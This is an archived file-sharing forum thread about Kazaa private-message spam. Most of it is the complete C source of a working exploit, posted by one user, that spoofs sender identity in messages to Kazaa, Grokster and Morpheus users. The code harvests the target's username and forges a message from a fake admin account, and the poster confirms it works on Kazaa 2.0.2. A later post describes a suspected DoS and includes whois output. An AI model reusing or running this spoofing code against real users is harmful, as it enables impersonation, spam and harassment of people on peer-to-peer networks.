GigaNews
View Full Version: FileSharing Talk

Threads in some sections have NO links for Guests, Register before you can view those threads or Log In now.
Your Ad Here

Pages: 1

Kazaa Pm Spam

(Click here to view the original thread with full colors/images)


Posted by: random nut

I just got this spam, I'm sure more will follow so beware of coming spam:


hi
Free Mp3 Download and LISTEN

Hip Hop - Pop - House - Trance - Rock - Nostalgie Charts
All new Songs

www.CENSORED.com


It was sent as a PM, probably automated. A couple of days ago I wondered why no-one had written a Kazaa spammer... I was wrong, someone already have it seems.


Posted by: ugluk

man, thats bad news. :angry: :(


Posted by: Rocko

Exploit code (Message spoofing):
/* kazaa-msg.c code
*
* Filename : kazaa-msg.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send a message to any kazaa, grokster and morpheus user,
* knowing their ip/hostname. Programmed for hackindex team.
* http://www.hackindex.com
*
* Compile: #gcc -o kazaa-msg kazaa-msg.c
*
* Usage: #./kazaa-msg host/ip message
*
* Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
*
* This will send a message to given kazaa user (host). Actually this is
* just a proof of concept. requiered fields for send a message are:
*
* X-Kazaa-Username
* X-Kazaa-Network
*
* These will form the "FROM" : name@network
* modify the id_ and minetwork defines to change "FROM" field.
*
* X-Kazaa-IMTo "TO" field. Remote kazaa's login
* (kazaa, grokster, morpheus)
* It's retrieved from a first connection to
* host.
* X-Kazaa-IMType user_text Type of data (fixed)
* X-Kazaa-IMData Message radix64 encoded.
*
* For grokster (tested) and morpheus (not tested) the name of the fields
* in the HTTP header are the same.
*
* If you want to receive any answer from the remote user, you must open
* a tcp socket listening on port 1214. HTTP header will be the same, and
* message must be decoded using Radix64 algorithm.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*
* Other Copyright:
*
* radix64 encode table and enc64() by Carl M. Ellison *
*
* NOTES:
* Not tested at all.. it my be bugged.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin" /* Default id for sending msg */
#define minetwork "hackindex" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Global variables ==--- */


char enctab[64] = { /* radix64 encoding table */
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
};

/* ---== Procedure section ==--- */

/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host mensaje\n", pname);
fflush (stdout);
exit(-1);
}

/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host)) == -1) {
printf(" :: Resolving host: %s\n", host);
if(!(host_ent = gethostbyname(host))) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
} return(addr.s_addr);
}


char *get_token (char *buffer, char *token){
char *stri, *strf;

if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}


void enc64( outbuff, out_lth, polth, inbuff, inb_lth, line_lth, n_space )
char *outbuff; /* output buffer */
long out_lth; /* allocated length of the output buffer */
long *polth; /* actual length of output */
unsigned char *inbuff; /* input (binary) buffer */
long inb_lth; /* length of inbuff */
long line_lth; /* maximum line lth (-1 means infinite) */
long n_space; /* # spaces at start of each text line */
{
long nl; /* # chars left in this line */
char *b, *c; /* walking pointers */

nl = line_lth;
b = inbuff;
c = outbuff;

while ( (inb_lth > 0)
&&(out_lth > 5) ) {
/* encoding */
c[0]=enctab[(b[0]>>2)&0x3f];
c[1]=enctab[((b[0]&0x3)<<4)|((b[1]>>4)&0xf)];
c[2]=enctab[((b[1]&0xf)<<2)|((b[2]>>6)&0x3)];
c[3]=enctab[b[2]&0x3f];
out_lth -= 4; /* count the code bytes */
switch (inb_lth) { /* take care of the final bytes */
case 1: c[2]='='; /* only 1, so == */
case 2: c[3]='='; /* 2, so = */
inb_lth = 0; /* either way, we're done */
c += 4; /* but no spaces */
*(c++) = '\n'; /* and there's an end of line */
break;

default:
inb_lth -= 3;
b += 3;
c += 4;
nl -= 4;
if (nl <= 0) {
long i;
*(c++) = '\n';
nl = line_lth;
for (i=0;i<n_space;i++)
*(c++) = ' ';
out_lth -= 1 + n_space;
}
break;
} /* switch */
} /* while */
*polth = c - outbuff;
} /* enc64 */

/* ---== MAIN Procedure ==--- */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id; /* user_name = id = remote user name */
char *user_net, *network; /* user_net = network = remote user network */
char *msg, *msgr64; /* Radix 64 stuf */
long olth; /* Radix 64 stuf */
char buffer[512]; /* Rec. buffer*/

printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");

if( argc < 3) {
usage( argv[0] );
}

/* Host resolv and connect */
host = argv[1];
TheHoSt.sin_family = AF_INET;
TheHoSt.sin_addr.s_addr = resol(host);
if(!TheHoSt.sin_addr.s_addr) {
printf(" :: ERROR: host not found.\n\n");
exit(-1);
}

/* We must get remote user name, need it to send any request */
TheHoSt.sin_port = htons(PORT);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" ::\n :: Getting username@network: "); fflush(stdout);

/* Search for username@userdomiain on host */
send(sock,http_basic,strlen(http_basic),0);
recv(sock,buffer,sizeof(buffer),0);
close(sock);

if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net); fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
exit (-1);
}

/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));

id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
exit (-1);
}


/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork);fflush(stdout);

/* Get msg length */
cont=2; c_=0;
while (cont < argc){
c_ = c_ + strlen(argv[cont++])+1;
}

/* Allocate buffer */
msg = malloc (c_);
bzero (msg, c_);

/* Store msg in buffer */
cont=2;
while (cont < argc){
strcat(msg,argv[cont]);
strcat(msg, " ");
cont++;
}
msg[strlen(msg)]=0;

/* Output buffer for radix64 conv */
msgr64 = malloc (2*c_);
bzero (msgr64, 2*c_);

/* Convert msg to radix 64 */
enc64( msgr64, 2*c_, &olth, msg, c_, 9999, 0 );

/* Store in buffer */
c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
btmp = malloc(c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id, msgr64);
send(sock,btmp,strlen(btmp),0);
while ((recv(sock,buffer,sizeof(buffer),0)!=-1) && (buffer[0] !=0)){
if (strstr(buffer, "200")){ // HTTP OK
printf(" :: Message sent.\n\n");
close(sock);
exit(0);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
}

printf(" :: Can't deliver message\n\n\n\n");
} else {
close(sock);
printf(" :: Can't connect. Service unavailable.\n\n");
exit(-1);
}
close(sock); //Remote host will close it when finished
return (-1);
}


Check http://www.securiteam.com/exploits/5RP0R1P6AC.html

Rocko


Posted by: random nut

Does that code work with Kazaa v2.0.0 or v2.0.2 or have they fixed that? The link you gave has been fixed but the above code doesn't seem to be the exact same code as the link.


Posted by: Rocko

Originally posted by random nut@28 January 2003 - 17:38
Does that code work with Kazaa v2.0.0 or v2.0.2 or have they fixed that? The link you gave has been fixed but the above code doesn't seem to be the exact same code as the link.
Yes it is, but in that page have two codes one for the DoS attack and below the code i posted for sending PM.

And it do work on Kazaa 2.0.2,

Rocko


Posted by: ToraBoraDweller

:o I had recently a DOS-attack (or attempt)
first thought it was a portscan ;I looked with Tcpview
and saw this IP :194.109.18.2
DNS looked like this :Cache.P2P !!!

whois revealed this :% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/d.../copyright.html (http://www.ripe.net/ripencc/pub-services/db/copyright.html)

inetnum: 194.109.18.0 - 194.109.18.7
netname: NETLINK
descr: Netlink BV
country: NL
admin-c: EM506-RIPE
tech-c: EM506-RIPE
tech-c: CB127
tech-c: OD45
status: ASSIGNED PA

remedy added IP-range to blocked zone in firewall

btw I still do not know what they really were attempting
it slowed my internet-traffic only about 30% ??





vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Limited.
vB Easy Archive Final ©2000 - 2008 - Created by Stefan "Xenon" Kaeser